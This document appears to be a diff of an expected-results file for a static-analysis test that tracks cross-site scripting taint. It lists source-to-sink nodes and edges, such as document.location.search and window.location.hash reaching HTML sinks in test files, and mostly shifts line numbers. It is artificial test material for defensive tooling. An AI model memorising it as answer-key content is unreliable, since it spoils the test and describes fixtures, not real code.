target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -831,8 +831,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | @@ -943,8 +943,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | @@ -954,8 +954,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | @@ -973,217 +973,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | 